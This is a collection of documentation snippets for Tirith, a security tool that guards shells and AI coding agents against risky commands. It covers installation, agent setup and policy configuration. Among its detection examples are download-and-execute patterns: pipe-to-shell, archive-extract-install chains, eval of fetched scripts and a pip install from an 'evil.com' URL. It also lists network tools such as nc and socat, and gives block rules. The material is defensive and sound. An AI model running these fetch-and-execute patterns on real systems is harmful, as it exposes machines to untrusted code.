### Archive Install Chain Example Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Demonstrates a common pattern of downloading an archive, extracting it, and then executing an installation script. ```text curl ... | tar xz && ./install.sh # download archive, extract, execute curl ... -o x.tgz && tar -xzf x.tgz && ./install.sh wget ... -O - | unzip - && ./setup.sh ``` -------------------------------- ### Quick Setup for Tirith Codex Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/codex.md Installs Tirith Codex, optionally installs the zshenv guard for non-interactive shells, and allows a dry run preview. This is the recommended setup method. ```bash tirith setup codex tirith setup codex --install-zshenv tirith setup codex --dry-run ``` -------------------------------- ### Quick Setup for Windsurf Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/windsurf.md Installs Windsurf, optionally installs the zshenv guard for non-interactive shells, and allows previewing the changes before applying them. Re-running is safe and idempotent. ```bash # Windsurf is always user-global tirith setup windsurf # Also install the zshenv guard for non-interactive shells tirith setup windsurf --install-zshenv # Preview what would be written tirith setup windsurf --dry-run ``` -------------------------------- ### Quick Setup for VS Code Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/vscode.md Run these commands for a quick and recommended setup of Tirith in VS Code. This includes project scope configuration and optionally installing the zshenv guard for non-interactive shells. Use `--dry-run` to preview changes. ```bash tirith setup vscode ``` ```bash tirith setup vscode --install-zshenv ``` ```bash tirith setup vscode --dry-run ``` -------------------------------- ### Quick Setup for Tirith Cursor Integration Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/cursor.md Use this command for a quick, recommended setup of Tirith with Cursor. It protects the current project by default, but can be configured for user/global scope or to install the zshenv guard. A dry-run option is available to preview changes. ```bash # Project scope (default) — protects this project tirith setup cursor # User/global scope — protects all Cursor projects tirith setup cursor --scope user # Also install the zshenv guard for non-interactive shells tirith setup cursor --install-zshenv # Preview what would be written tirith setup cursor --dry-run ``` -------------------------------- ### Quick Setup for Copilot CLI Hooks Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/copilot-cli.md Installs the necessary hook script and configuration for Copilot CLI. Re-running is safe. Use --force to update existing entries. ```bash tirith setup copilot-cli ``` ```bash tirith setup copilot-cli --dry-run ``` -------------------------------- ### Dry Run Setup Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/pi-cli.md Previews the changes that would be made during Tirith guard setup without actually modifying files. Useful for understanding the setup process. ```bash tirith setup pi-cli --dry-run ``` -------------------------------- ### Download and Install Tirith from GitHub Release Source: https://github.com/sheeki03/tirith/blob/main/README.md Download the musl build from the latest GitHub release, extract it, and install it to your bin directory. Verify the installation by checking the version. ```bash curl -fsSL -o tirith.tar.gz \ https://github.com/sheeki03/tirith/releases/latest/download/tirith-aarch64-unknown-linux-musl.tar.gz tar xzf tirith.tar.gz install -Dm755 tirith "$PREFIX/bin/tirith" tirith --version ``` -------------------------------- ### Install Tirith using Scoop on Windows Source: https://github.com/sheeki03/tirith/blob/main/README.md Add the Tirith Scoop bucket and then install Tirith. ```powershell scoop bucket add tirith https://github.com/sheeki03/scoop-tirith scoop install tirith ``` -------------------------------- ### Install Tirith Source: https://github.com/sheeki03/tirith/blob/main/docs/dogfood-guide.md Install the Tirith CLI tool from its source path. ```sh cargo install --path crates/tirith ``` -------------------------------- ### Install Tirith via Nix Source: https://github.com/sheeki03/tirith/blob/main/README.md Installs Tirith using Nix package manager, either from nixpkgs or an upstream flake. Also shows how to run without installation. ```bash nix profile install nixpkgs#tirith # from nixpkgs nix profile install github:sheeki03/tirith # from upstream flake # or try without installing: nix run github:sheeki03/tirith -- --version ``` -------------------------------- ### Install Tirith using Mise Source: https://github.com/sheeki03/tirith/blob/main/README.md Install Tirith globally using the Mise tool. ```bash mise use -g tirith ``` -------------------------------- ### Preview Claude Code Setup Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/claude-code.md Previews the changes that would be made by the tirith setup claude-code command without actually applying them. Useful for understanding the setup process. ```bash tirith setup claude-code --dry-run ``` -------------------------------- ### Quick Setup for Kiro CLI Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/kiro.md Sets up the Tirith security agent for Kiro CLI. Use `--scope user` for global setup or `--dry-run` to preview changes. ```bash tirith setup kiro tirith setup kiro --scope user tirith setup kiro --dry-run ``` -------------------------------- ### Install Tirith using Cargo Source: https://github.com/sheeki03/tirith/blob/main/README.md Install Tirith using the Cargo package manager. ```bash cargo install tirith ``` -------------------------------- ### Install Tirith on Debian/Ubuntu Source: https://github.com/sheeki03/tirith/blob/main/README.md Installs Tirith on Debian or Ubuntu systems by downloading and installing a .deb package from GitHub Releases. ```bash sudo dpkg -i tirith_*_amd64.deb ``` -------------------------------- ### Install Tirith via Homebrew Source: https://github.com/sheeki03/tirith/blob/main/README.md Installs the Tirith CLI using the Homebrew package manager. ```bash brew install sheeki03/tap/tirith ``` -------------------------------- ### Tirith Command: Get Last Install Receipt Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Retrieves and displays the details of the most recent script installation recorded by Tirith. ```bash $ tirith receipt last Last install: https://get.example-tool.sh SHA256: a1b2c3d4e5f6... Domains referenced: cdn.example-tool.sh Paths referenced: ~/.example-tool/bin/example-tool, ~/.bashrc Analysis: static (inferred from script content) Run at: 2026-02-01 14:32 UTC in /Users/dev/project (main) ``` -------------------------------- ### Oh-My-Zsh Plugin Installation Source: https://github.com/sheeki03/tirith/blob/main/README.md Instructions for installing the Tirith Oh-My-Zsh plugin. This involves cloning the repository and adding the plugin to your .zshrc file. ```bash git clone https://github.com/sheeki03/ohmyzsh-tirith \ ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/tirith # Add tirith to plugins in ~/.zshrc: plugins=(... tirith) ``` -------------------------------- ### Install Tirith using asdf Source: https://github.com/sheeki03/tirith/blob/main/README.md Add the Tirith asdf plugin, install the latest version, and set it as the global version. ```bash asdf plugin add tirith https://github.com/sheeki03/asdf-tirith.git asdf install tirith latest asdf global tirith latest ``` -------------------------------- ### Install Tirith using Chocolatey on Windows Source: https://github.com/sheeki03/tirith/blob/main/README.md Install Tirith using Chocolatey. This is currently under moderation. ```powershell choco install tirith ``` -------------------------------- ### Install Tirith globally using npm Source: https://github.com/sheeki03/tirith/blob/main/README.md Install Tirith globally using the npm package manager. ```bash npm install -g tirith ``` -------------------------------- ### Project Scope Setup Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/pi-cli.md Protects the current project by registering the Tirith guard with Pi CLI. Re-running is safe and idempotent. ```bash tirith setup pi-cli ``` -------------------------------- ### TIRITH Policy Configuration Example Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md This YAML file defines security rules for TIRITH. It includes settings for hostname validation, URL path analysis, transport security, command execution safety, terminal input handling, and environment variable checks. Specific lists can be defined for allowed registries, installation domains, and package sources. The 'paranoia' level adjusts the strictness of checks. ```yaml version: 1 rules: # Hostname checks non_ascii_hostname: block # default, homograph protection punycode_domains: block # default mixed_script_in_label: block # mixed script within same DNS label (excl. hyphen/digits) bidi_controls: block # default zero_width_chars: block # default userinfo_urls: block # default, @ trick protection confusable_domains: warn # visual similarity check lookalike_tlds: warn # .zip, .mov, etc. raw_ip_urls: block # no http://1.2.3.4/anything non_standard_ports: warn # unexpected ports on known domains # Path/URL checks non_ascii_in_path: warn # confusables in URL path double_encoding: warn # nested percent-encoding shortened_urls: warn # flag but allow bit.ly etc. # Transport checks plain_http_to_sink: block # http:// + execution sink = no TLS = trivial MITM schemeless_url_to_sink: warn # ambiguous scheme, likely HTTP insecure_tls_flags: block # curl -k, wget --no-check-certificate (with sink) insecure_tls_flags_no_sink: warn # curl -k without sink # Command checks pipe_to_shell: block # no curl|bash allowed, period dotfile_overwrite: block # write to ~/.bashrc, ~/.ssh/*, etc. dotfile_append: block # append to ~/.ssh/config, ~/.profile, etc. heredoc_to_sensitive_file: block # heredoc targeting sensitive paths download_to_path: warn # downloading into PATH directories archive_extract_exec: warn # curl | tar x && ./install.sh silent_download_pipe: warn # curl -s | bash sudo_sink: warn # elevated privilege execution remote_pipe: warn # ssh host 'curl | sh' powershell_download_exec: warn # iwr | iex, irm | iex # Terminal safety ansi_escapes_in_paste: block # default, escape sequence injection control_chars_in_paste: block # default, \r \b tricks hidden_multiline_paste: warn # multi-line paste with hidden commands # Environment checks proxy_env_elevation: warn # elevate warnings when proxy env vars detected # Special allowed_registries: # only these for docker pull - docker.io - ghcr.io - gcr.io allowed_install_domains: # only these for curl|bash (if pipe_to_shell is warn, not block) - get.example-tool.sh - sh.rustup.rs - raw.githubusercontent.com allowed_package_sources: # only these for pip/npm from URL - pypi.org - registry.npmjs.org allowed_idn_domains: [] # legitimate IDN domains to permit allow_bypass_env: false # if false, TIRITH=0 is ignored paranoia: medium # low: purely local, no DNS, no network, no disk reads beyond allowlist. # Checks: homographs, punycode, mixed-script, control chars, bidi, # zero-width, # userinfo, insecure TLS flags, plain HTTP to sink. # medium: local + receipts + heavier tokenization + source-sink analysis. # Adds: pipe-to-shell, IP URLs, dotfile clobber, command shape, archive chains, # proxy env detection, confusable domains, path homoglyphs. # high: network calls with strict timeouts and caching. # Adds: shortened URL expansion, redirect chain resolution, domain age, # cert age checks. Org policy may restrict high to managed devices only. ``` -------------------------------- ### AI Agent Setup Commands Source: https://github.com/sheeki03/tirith/blob/main/README.md Commands to set up various AI agent integrations with Tirith. Use `tirith setup ` for one-command configuration. Some tools support additional options like `--with-mcp`. ```bash tirith setup claude-code --with-mcp # Claude Code + MCP server tirith setup codex # OpenAI Codex tirith setup copilot-cli # GitHub Copilot CLI (run from repo root) tirith setup cursor # Cursor tirith setup gemini-cli --with-mcp # Gemini CLI + MCP server tirith setup kiro # Kiro CLI (formerly Amazon Q) tirith setup pi-cli # Pi CLI tirith setup vscode # VS Code tirith setup windsurf # Windsurf ``` -------------------------------- ### Initialize Tirith Policy with Template Source: https://github.com/sheeki03/tirith/blob/main/README.md Initializes the Tirith policy file using a predefined template. Examples include 'individual', 'ci-strict', and 'ai-agent-heavy'. ```bash tirith policy init --template individual ``` ```bash tirith policy init --template ci-strict ``` ```bash tirith policy init --template ai-agent-heavy ``` -------------------------------- ### Install Tirith on Fedora/RHEL/CentOS Source: https://github.com/sheeki03/tirith/blob/main/README.md Installs Tirith on Fedora, RHEL, or CentOS 9+ systems by downloading and installing an .rpm package from GitHub Releases. ```bash sudo dnf install ./tirith-*.rpm ``` -------------------------------- ### Tirith Command: List All Install Receipts Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Displays a summary list of all recorded script installations, including date, URL, SHA256, and analysis method. ```bash $ tirith receipt list 2026-02-01 https://get.example-tool.sh a1b2c3... 2026-01-28 https://sh.rustup.rs f7e8d9... 2026-01-15 https://get.docker.com b3c4d5... ``` -------------------------------- ### Team Policy Engine Example Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md A YAML example demonstrating the structure for defining organizational policies within the Tirith Team Policy Engine. ```yaml --- ``` -------------------------------- ### User Scope Setup Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/pi-cli.md Protects all Pi CLI projects globally by registering the Tirith guard. Re-running is safe and idempotent. ```bash tirith setup pi-cli --scope user ``` -------------------------------- ### Install Tirith via AUR on Arch Linux Source: https://github.com/sheeki03/tirith/blob/main/README.md Installs Tirith on Arch Linux using the AUR helpers 'yay' or 'paru'. ```bash yay -S tirith # or: paru -S tirith ``` -------------------------------- ### Quick Setup for OpenClaw Integration Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/openclaw.md Use these commands to automatically set up the Tirith OpenClaw plugin for project or user scope. The --dry-run option previews changes without applying them. ```bash tirith setup openclaw tirith setup openclaw --scope user tirith setup openclaw --dry-run ``` -------------------------------- ### Install Shell Hooks Source: https://github.com/sheeki03/tirith/blob/main/SKILL.md Installs shell hooks for zsh, bash, fish, and nushell. Ensure to evaluate or source the output for the current shell session. ```bash eval "$(tirith init --shell zsh)" # zsh eval "$(tirith init --shell bash)" # bash tirith init --shell fish | source # fish tirith init --shell nushell | source # nushell ``` -------------------------------- ### Install MCP Server for Tirith Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/claude-code.md Add this configuration to your project's `.mcp.json` file to install the MCP server for on-demand Tirith tools. This enables the 'tirith mcp-server' command. ```json { "mcpServers": { "tirith": { "command": "tirith", "args": ["mcp-server"] } } } ``` -------------------------------- ### Example of Safe Commands Source: https://github.com/sheeki03/tirith/blob/main/README.md Illustrates common commands that Tirith allows to execute without any output or intervention, demonstrating its zero-friction operation on clean input. ```bash $ git status $ ls -la $ docker compose up -d ``` -------------------------------- ### Tirith feed configuration example Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Illustrates the local configuration file structure for the Tirith feed, showing how threat intelligence data is synced and stored. ```json ~/.tirith/feed.json <- synced daily (or hourly for teams) tirith checks feed FIRST <- known-bad = instant block then falls through to local <- heuristic detection pattern detection Feed is a signed JSON file <- ed25519 signature, prevents tampering pulled from api.tirith.dev ``` -------------------------------- ### Example: Allowed Normal Command Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/kiro.md Illustrates a case where a standard command like `ls -la` is allowed to run normally by the hook. ```bash # Ask: "ls -la" ``` -------------------------------- ### Install Tirith on Android (Termux) Source: https://github.com/sheeki03/tirith/blob/main/README.md Installs Tirith on Android using Termux, specifying the musl build for compatibility with Bionic libc. ```bash # In Termux: pkg install curl tar ``` -------------------------------- ### URL-like Pattern Examples Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Shows various URL formats and protocols that Tirith detects, including non-HTTP VCS and registry references. ```text http://, https:// | Standard URLs git@host:org/repo.git | SCP-style git syntax ssh://, git://, svn:// | Non-HTTP VCS protocols rsync:// | rsync protocol ftp://, ftps:// | FTP npm install git+https://... | npm git dependency pip install -e git+... | pip editable git install docker pull registry/repo | Docker registry references (no scheme) curl example.com/install.sh — Schemeless URLs ``` -------------------------------- ### Check Tirith Version Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/codex.md Verifies that the tirith executable is installed and accessible on the system PATH. ```bash tirith --version ``` -------------------------------- ### Manual MCP Gateway Setup for Codex Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/codex.md Manually configures the MCP gateway for Codex by copying the gateway configuration and registering the MCP server with Codex. ```bash mkdir -p ~/.config/tirith cp mcp/tirith-gateway.yaml ~/.config/tirith/gateway.yaml codex mcp remove tirith-gateway 2>/dev/null || true codex mcp add tirith-gateway -- \ tirith gateway run \ --upstream-bin tirith \ --upstream-arg mcp-server \ --config ~/.config/tirith/gateway.yaml ``` -------------------------------- ### Detect pip install from URL Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Warns when installing a Python package directly from a URL instead of PyPI, indicating a deviation from standard practice and potential risk. Offers options to continue or abort. ```bash $ pip install https://evil.com/requests-2.28.tar.gz WARN: Installing Python package from raw URL, not from PyPI. Known PyPI package with same name: requests (https://pypi.org/project/requests/) [c]ontinue [a]bort ``` -------------------------------- ### Explain a trust entry Source: https://github.com/sheeki03/tirith/blob/main/docs/cookbook.md Get detailed information about a specific trust entry, such as for `get.docker.com`, using `tirith trust explain`. ```bash tirith trust explain get.docker.com ``` -------------------------------- ### Lookalike Domain Alert Example Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md An example of an actionable alert generated by Tirith Monitor when a lookalike domain is detected. It includes evidence and pre-filled abuse reports. ```text NEW LOOKALIKE DETECTED ============================================================ Your domain: example-cli.dev Lookalike: example-clі.dev (Cyrillic і) Registered: 2026-01-30 (2 days ago) Registrar: Namecheap Hosting: 185.234.xx.xx (Hetzner, DE) MX records: Yes (email interception capable) Serves content: Yes (HTTP 200) TLS cert: Let's Encrypt, issued 2026-01-30 Evidence bundle: |- Screenshot of served page |- DNS records snapshot |- Certificate details |- HTTP headers |- First seen timestamp Actions: |- Pre-filled abuse report for Namecheap [copy] |- Pre-filled abuse report for Hetzner [copy] |- Pre-filled Google Safe Browsing report [copy] |- Registrar/hosting contact info extracted |- Add to tirith feed blocklist [done automatically] ``` -------------------------------- ### Verify Tirith Kiro Setup Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/kiro.md Verifies the Tirith security agent configuration for Kiro CLI by checking agent settings and running a test command. ```bash tirith setup kiro --scope user cat ~/.kiro/agents/tirith-security.json | jq '{tools, includeMcpJson, hooks}' # Expect: tools=["*"], includeMcpJson=true, hooks.preToolUse populated. kiro-cli --agent tirith-security ``` -------------------------------- ### Start, Stop, and Status for Tirith Daemon Source: https://github.com/sheeki03/tirith/blob/main/docs/roadmap.md Manage the persistent background process for Tirith's daemon mode on Unix-like systems. ```bash tirith daemon start/stop/status ``` -------------------------------- ### Manual Kiro CLI Agent Setup Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/kiro.md Manually configures the Tirith security agent and hook script for Kiro CLI. Ensure `tirith --version` is in your PATH. ```bash tirith --version # ensure on PATH mkdir -p ~/.kiro/hooks ~/.kiro/agents # copy kiro-hook.py from your tirith install into ~/.kiro/hooks/ chmod +x ~/.kiro/hooks/kiro-hook.py cat > ~/.kiro/agents/tirith-security.json <<'EOF' { "description": "Tirith security guard: intercepts execute_bash tool calls and blocks dangerous commands.", "tools": ["*"], "includeMcpJson": true, "hooks": { "preToolUse": [ { "matcher": "execute_bash", "command": "python3 /Users/you/.kiro/hooks/kiro-hook.py" } ] } } EOF ``` -------------------------------- ### Install MCP Gateway Configuration Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/cursor.md Configure the MCP Servers in Cursor settings to use the tirith gateway for tool execution. This involves adding a server entry and copying a configuration template. ```json { "mcpServers": { "tirith-gateway": { "command": "tirith", "args": [ "gateway", "run", "--upstream-bin", "tirith", "--upstream-arg", "mcp-server", "--config", "~/.config/tirith/gateway.yaml" ] } } } ``` ```bash mkdir -p ~/.config/tirith cp mcp/tirith-gateway.yaml ~/.config/tirith/gateway.yaml ``` -------------------------------- ### Normalization: Percent-Decoding Example Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Illustrates iterative percent-decoding to reveal hidden characters in URLs. This process is capped to prevent denial-of-service attacks. ```text %2568ttp -> %68ttp -> http ``` -------------------------------- ### Example of a safe alternative command Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Provides a safe alternative command when a potentially risky pattern like 'pipe-to-shell' is detected. This promotes secure execution practices. ```bash WARN: Pipe-to-shell detected. Safe alternative: tirith run https://get.example-tool.sh ``` -------------------------------- ### Force Update Setup Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/pi-cli.md Updates existing Tirith guard entries in Pi CLI configuration. Use this option to ensure you have the latest guard configuration. ```bash tirith setup pi-cli --force ``` -------------------------------- ### Initialize Policy from Template Source: https://github.com/sheeki03/tirith/blob/main/docs/cookbook.md Use templates to quickly set up a curated policy baseline. Choose templates like 'individual', 'ci-strict', or 'ai-agent-heavy' based on your environment. ```bash tirith policy init --template individual # solo developer defaults tirith policy init --template ci-strict # fail-closed CI, no bypass tirith policy init --template ai-agent-heavy # heavy AI-agent environments ``` -------------------------------- ### Tirith Policy File Configuration Source: https://github.com/sheeki03/tirith/blob/main/README.md Example YAML configuration for Tirith policy, including fail mode, paranoia level, allowlists, blocklists, and scan profiles. ```yaml fail_mode: open # or "closed" for strict environments paranoia: 1 # 1-4: higher = more sensitive strict_warn: false # require explicit acknowledgement for warnings allowlist: - "get.docker.com" - "sh.rustup.rs" blocklist: - "evil.example.com" severity_overrides: docker_untrusted_registry: CRITICAL scan: ignore_patterns: - "node_modules" - "target" profiles: ci: include: ["*.md", "*.json", "*.yaml", ".claude/*"] fail_on: high ``` -------------------------------- ### Redirect Awareness: High Paranoia GET Request Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Example of a high-paranoia network check using a GET request with a Range header to resolve redirect chains, avoiding unreliable HEAD requests. ```http GET /install.sh HTTP/1.1 Host: legit.com Range: bytes=0-0 ``` -------------------------------- ### Configure Tirith policy to allowlist trusted sources Source: https://github.com/sheeki03/tirith/blob/main/docs/cookbook.md Define trusted URLs in `.tirith/policy.yaml` to suppress the pipe-to-shell warning for routine installations from known sources. ```yaml # .tirith/policy.yaml allowlist: - "get.docker.com" - "raw.githubusercontent.com/org/repo" ``` -------------------------------- ### Setup Claude Code for User Scope Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/claude-code.md Sets up Claude Code protection globally for the user, protecting all projects. This command registers the hook script and settings for all projects. ```bash tirith setup claude-code --scope user ``` -------------------------------- ### Initialize Tirith Policy Source: https://github.com/sheeki03/tirith/blob/main/README.md Initializes the Tirith policy file in the repository. Use --template to select a starter policy. ```bash tirith policy init ``` -------------------------------- ### Setup Claude Code with MCP Server Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/claude-code.md Sets up Claude Code protection including the MCP server for on-demand tools. This supplements the automatic hook with explicit security check capabilities. ```bash tirith setup claude-code --with-mcp ``` -------------------------------- ### Setup Claude Code Protection Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/claude-code.md Sets up Claude Code protection for the current project scope. This command creates the hook script and registers it in settings.json. Re-running is safe. ```bash tirith setup claude-code ``` -------------------------------- ### Tirith Rule Explanation Commands Source: https://github.com/sheeki03/tirith/blob/main/README.md Commands to explain specific Tirith rules, including severity, examples, remediation, and MITRE ATT&CK mappings. You can also list rules by category or get just the remediation. ```bash tirith explain --rule pipe_to_interpreter # severity, examples, remediation, MITRE ATT&CK tirith explain --rule curl_pipe_shell --fix # just the remediation ("what to do instead") tirith explain --list --category terminal # all rules in a category ``` -------------------------------- ### Quick Setup for Gemini CLI Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/gemini-cli.md Use these commands to quickly set up Tirith's security hook for Gemini CLI. Supports project-specific, user-global scopes, and integration with MCP server. Includes a dry-run option to preview changes. ```bash # Project scope (default) -- protects this project tirith setup gemini-cli # User/global scope -- protects all Gemini CLI projects tirith setup gemini-cli --scope user # Also register the MCP server for on-demand tools tirith setup gemini-cli --with-mcp # Preview what would be written tirith setup gemini-cli --dry-run ``` -------------------------------- ### Uninstall Tirith via nix profile Source: https://github.com/sheeki03/tirith/blob/main/docs/uninstall.md Use this command to uninstall Tirith if it was installed using `nix profile install`. Note that `nix run` does not install anything permanently. ```shell nix profile remove github:sheeki03/tirith ``` -------------------------------- ### Policy Management Commands Source: https://github.com/sheeki03/tirith/blob/main/SKILL.md Initialize a starter or minimal policy, validate existing policies for errors, or test a command against the current policy. ```bash tirith policy init ``` ```bash tirith policy init --minimal ``` ```bash tirith policy validate ``` ```bash tirith policy test 'curl https://example.com | bash' ``` -------------------------------- ### Install Tirith Shell Hook Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Source the Tirith shell hook script in your shell configuration file for installation. ```bash source ~/.tirith/tirith.sh ``` -------------------------------- ### Remove Tirith binary installed via shell script Source: https://github.com/sheeki03/tirith/blob/main/docs/uninstall.md If Tirith was installed using a shell script, manually remove the binary from its location. ```shell rm ~/.local/bin/tirith ``` -------------------------------- ### Source-to-Sink Pipe Patterns Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Illustrates various methods for piping or connecting output from a source command to a sink command. ```text source | sink # direct pipe source > file && sink file # download-then-exec source -o file && chmod +x file && ./file sink <(source) # process substitution sink <<< "$(source)" # here-string sink -c "$(source)" # command substitution eval "$(source)" # eval substitution . <(source) # dot-source ssh host 'source | sink' # remote pipe scp host:file /tmp/x && /tmp/x # remote fetch + exec ``` -------------------------------- ### Tirith Install Receipt Data Structure Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md This JSON object represents the data stored for each script installation receipt when Tirith runs in safe mode. ```json { "url": "https://get.example-tool.sh", "final_url": "https://get.example-tool.sh", "redirects": 0, "sha256": "a1b2c3d4e5f6...", "size_bytes": 4301, "domains_referenced": ["cdn.example-tool.sh"], "paths_referenced": ["~/.example-tool/bin/example-tool", "~/.bashrc"], "analysis_method": "static", "privilege": "user", "timestamp": "2026-02-01T14:32:01Z", "cwd": "/Users/dev/project", "git_repo": "github.com/dev/project", "git_branch": "main" } ``` -------------------------------- ### Verify Tirith Installation Source: https://github.com/sheeki03/tirith/blob/main/docs/dogfood-guide.md Run the 'tirith doctor' command to verify the installation and check for correct hook directory detection, shell detection, and data directory existence. ```sh tirith doctor ``` -------------------------------- ### Initialize Tirith for Fish Shell Source: https://github.com/sheeki03/tirith/blob/main/README.md Activates Tirith's security features for the Fish shell by sourcing its initialization script. ```bash # fish tirith init --shell fish | source ``` -------------------------------- ### Configure Tirith with Nix/Home-Manager Source: https://github.com/sheeki03/tirith/blob/main/README.md Add Tirith to your system packages and configure the zsh shell hook. ```nix home.packages = [ pkgs.tirith ]; programs.zsh.initContent = '' eval "$(tirith init --shell zsh)" ''; ``` -------------------------------- ### Learning Mode Policy Configuration Source: https://github.com/sheeki03/tirith/blob/main/docs/cookbook.md Configures all security rules to have LOW severity, ensuring nothing blocks execution and useful for onboarding. ```yaml # ~/.config/tirith/policy.yaml fail_mode: open allow_bypass_env: true severity_overrides: curl_pipe_shell: LOW wget_pipe_shell: LOW pipe_to_interpreter: LOW punycode_domain: LOW confusable_domain: LOW ``` -------------------------------- ### Team Activity Dashboard Example Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md This is an example of the Team Activity Dashboard, which provides a summary of security events across an organization. It highlights blocked and warned activities, top threats, and receipt activity, and can feed into SIEM systems. ```text This week across your org (14 developers): Blocked: 3 homograph attempts Warned: 12 pipe-to-shell commands Allowed: 847 clean URLs (zero friction) Top blocked: https://xn--gthub-esa.com (Cyrillic і) -- hit by 2 devs Top warned: curl https://raw.githubusercontent.com/... | bash New on blocklist: 7 domains targeting your stack Receipt activity: |- 23 install scripts run via tirith run |- 3 scripts changed since last run (re-verification needed) ``` -------------------------------- ### Uninstall Tirith via Cargo Source: https://github.com/sheeki03/tirith/blob/main/docs/uninstall.md Use this command to uninstall Tirith if it was installed using Cargo. ```shell cargo uninstall tirith ``` -------------------------------- ### Uninstall Tirith via Homebrew Source: https://github.com/sheeki03/tirith/blob/main/docs/uninstall.md Use this command to uninstall Tirith if it was installed using Homebrew. ```shell brew uninstall tirith ``` -------------------------------- ### Uninstall Tirith via AUR (Arch Linux) Source: https://github.com/sheeki03/tirith/blob/main/docs/uninstall.md Use these commands to uninstall Tirith if installed from the AUR. ```shell pacman -Rns tirith # or: yay -Rns tirith # or: paru -Rns tirith ``` -------------------------------- ### Uninstall Tirith via npm Source: https://github.com/sheeki03/tirith/blob/main/docs/uninstall.md Use this command to uninstall Tirith if it was installed globally via npm. ```shell npm uninstall -g tirith ``` -------------------------------- ### Uninstall Tirith via Chocolatey (Windows) Source: https://github.com/sheeki03/tirith/blob/main/docs/uninstall.md Use this command to uninstall Tirith on Windows if installed via Chocolatey. ```powershell choco uninstall tirith ``` -------------------------------- ### Uninstall Tirith via Scoop (Windows) Source: https://github.com/sheeki03/tirith/blob/main/docs/uninstall.md Use this command to uninstall Tirith on Windows if installed via Scoop. ```powershell scoop uninstall tirith ``` -------------------------------- ### Common Command Sources Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Lists common command-line utilities used for fetching remote content. These are considered 'sources' in Tirith's model. ```text curl, wget, fetch, aria2c, httpie (http/https) git clone, git pull, git submodule update docker pull, docker build (FROM) scp, rsync nc, ncat, socat python -c "import urllib...", node -e "fetch(...)" ``` -------------------------------- ### Download and Execute Script Safely (Unix) Source: https://github.com/sheeki03/tirith/blob/main/SKILL.md Downloads a script, analyzes it for threats, and optionally executes it with SHA-256 verification and receipt logging. Use '--no-exec' to analyze only. ```bash tirith run https://get.example-tool.sh tirith run --no-exec https://example.com/install.sh # analyze only tirith run --sha256 abc123... https://example.com/install.sh ``` -------------------------------- ### Configure Allowlist and Blocklist Source: https://github.com/sheeki03/tirith/blob/main/TIRITH.md Define domains to be automatically allowed or blocked. Allowlisted domains bypass checks, while blocklisted domains are always denied. ```text # ~/.tirith/allowlist — one domain per line, supports wildcards get.example-tool.sh sh.rustup.rs raw.githubusercontent.com *.docker.com # ~/.tirith/blocklist — manually blocked domains evil-domain.xyz ``` ```yaml # policy.yml allowed_idn_domains: - "münchen.de" - "例え.jp" ``` -------------------------------- ### Add a permanent trust entry with a reason Source: https://github.com/sheeki03/tirith/blob/main/docs/cookbook.md Use `--permanent` to create a trust entry that never expires and `--reason` to document why it was added. ```bash Use --permanent if an entry genuinely should never expire, and --reason to record why it was added — `tirith trust explain` shows it back to you. ``` -------------------------------- ### Copy Tirith Gateway Configuration Template Source: https://github.com/sheeki03/tirith/blob/main/mcp/clients/windsurf.md Copies the template configuration file for the Tirith gateway to the user's configuration directory. ```bash mkdir -p ~/.config/tirith cp mcp/tirith-gateway.yaml ~/.config/tirith/gateway.yaml ```